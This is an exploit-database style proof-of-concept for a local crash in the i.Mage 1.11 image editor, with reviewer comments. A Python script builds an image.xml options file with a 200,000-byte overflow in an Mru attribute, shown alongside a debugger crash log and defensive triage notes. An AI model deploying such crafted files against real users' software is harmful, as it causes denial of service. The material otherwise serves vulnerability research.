i.Mage 1.11 Local Crash Proof Of Concept
Posted on 07 November 2014
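#!/usr/bin/python
#Exploit Title:i.Mage Local Crash Poc
#Homepage:http://www.memecode.com/image.php
#Software Link:http://sourceforge.net/projects/image-editor/files/i.mage-win32-v111.exe/download
#Version:i.i.Mage v1.11 (Win32 Release)
#Description:i.Mage is a small and fast graphics editor slanted towards quite and easy pixel editing...
#Tested on:Win7 32bit EN-Ultimate
#Exploit Author: metacom
#Date:26.10.2014
#
# Reviewer summary: this script writes image.xml, an i.Mage options file whose
# <Mru Item0="..."> attribute value is a newline followed by 200000 "A" bytes.
# The log below shows only a crash (an access violation while reading); the
# page demonstrates nothing beyond denial of service.
#
# NOTE(review): the page extraction dropped every backslash, so the escapes
# appeared as "x41", "x3c", ... and the install path had no separators. They
# are restored here; the byte values themselves are unchanged.
'''
Immunity Debugger Log data
Address=77B85FBD
Message=[17:21:47] Access violation when reading [41414145]
EAX 01354078 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01374F10
ESP 0012F810
EBP 0012F838
ESI 01354070 ASCII "AAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 003A0000
EIP 77B85FBD ntdll.77B85FBD'''
# Reading the log: the faulting instruction is inside ntdll, ECX and EDX both
# hold 0x41414141, and the address being read is 0x41414145, so filler bytes
# from the file ended up in pointer-sized values. That is consistent with the
# application copying the attribute value without a length bound - presumably
# into a heap buffer; confirm against the i.Mage source before relying on it.
#
# Defensive takeaways: the options loader should treat image.xml as untrusted
# input and cap (or reject) over-long attribute values. For triage, an
# image.xml of roughly 200 KB, or an Mru entry far longer than any file path,
# is the observable artefact of this test case.

# Parenthesised single-argument print works on both Python 2 and Python 3;
# the original used the Python 2-only print statement.
print(" [*]Vulnerable Created image.xml!")
# Raw string keeps the restored Windows path separators literal.
print(r"[*]Copy image.xml to C:\Program Files\Memecode\i.Mage")
print("[*]Start i.Mage")
print("[*]------------------------------------------------")

# Filler for the Item0 attribute: 200000 bytes of 0x41 ("A").
poc = "\x41" * 200000

# XML prologue plus the opening of the <Options> element. Decoded, the bytes
# read:
#   <?xml version="1.0" encoding="UTF-8" ?>
#   <Options EraseWidth="10" EraseAmount="255" DspGrid="1" ToolOpen="0"
#            Angle="0" Pos="717,340,1117,640" EnabledUndo="1" FillObjects="1"
#            TransparentPaste="0" Operator="0" Alpha="255" SplitterPos="250">
#       <Mru Items="0" Item0="
# (each attribute sits on its own line in the real output; they are wrapped
# here for readability). The Item0 value is left open so the filler lands
# inside it.
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x45\x72\x61\x73\x65\x57\x69\x64\x74\x68\x3d"
header += "\x22\x31\x30\x22\x0a\x09\x20\x45\x72\x61\x73\x65\x41\x6d\x6f\x75\x6e\x74\x3d\x22\x32\x35\x35\x22\x0a\x09\x20\x44\x73\x70"
header += "\x47\x72\x69\x64\x3d\x22\x31\x22\x0a\x09\x20\x54\x6f\x6f\x6c\x4f\x70\x65\x6e\x3d\x22\x30\x22\x0a\x09\x20\x41\x6e\x67\x6c"
header += "\x65\x3d\x22\x30\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x37\x31\x37\x2c\x33\x34\x30\x2c\x31\x31\x31\x37\x2c\x36\x34\x30\x22"
header += "\x0a\x09\x20\x45\x6e\x61\x62\x6c\x65\x64\x55\x6e\x64\x6f\x3d\x22\x31\x22\x0a\x09\x20\x46\x69\x6c\x6c\x4f\x62\x6a\x65\x63"
header += "\x74\x73\x3d\x22\x31\x22\x0a\x09\x20\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x74\x50\x61\x73\x74\x65\x3d\x22\x30\x22\x0a"
header += "\x09\x20\x4f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x30\x22\x0a\x09\x20\x41\x6c\x70\x68\x61\x3d\x22\x32\x35\x35\x22\x0a\x09"
header += "\x20\x53\x70\x6c\x69\x74\x74\x65\x72\x50\x6f\x73\x3d\x22\x32\x35\x30\x22\x3e\x0a\x09\x3c\x4d\x72\x75\x20\x49\x74\x65\x6d"
header += "\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x0a" + poc

# Closes the attribute and both elements; decoded: '" />\n</Options>\n'
footer = "\x22\x20\x2f\x3e\x0a\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"

payload = header + footer

# Context manager so the handle is flushed and closed even if write() raises;
# the original relied on an explicit close() that an exception would skip.
with open("image.xml", "w") as out_file:
    out_file.write(payload)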
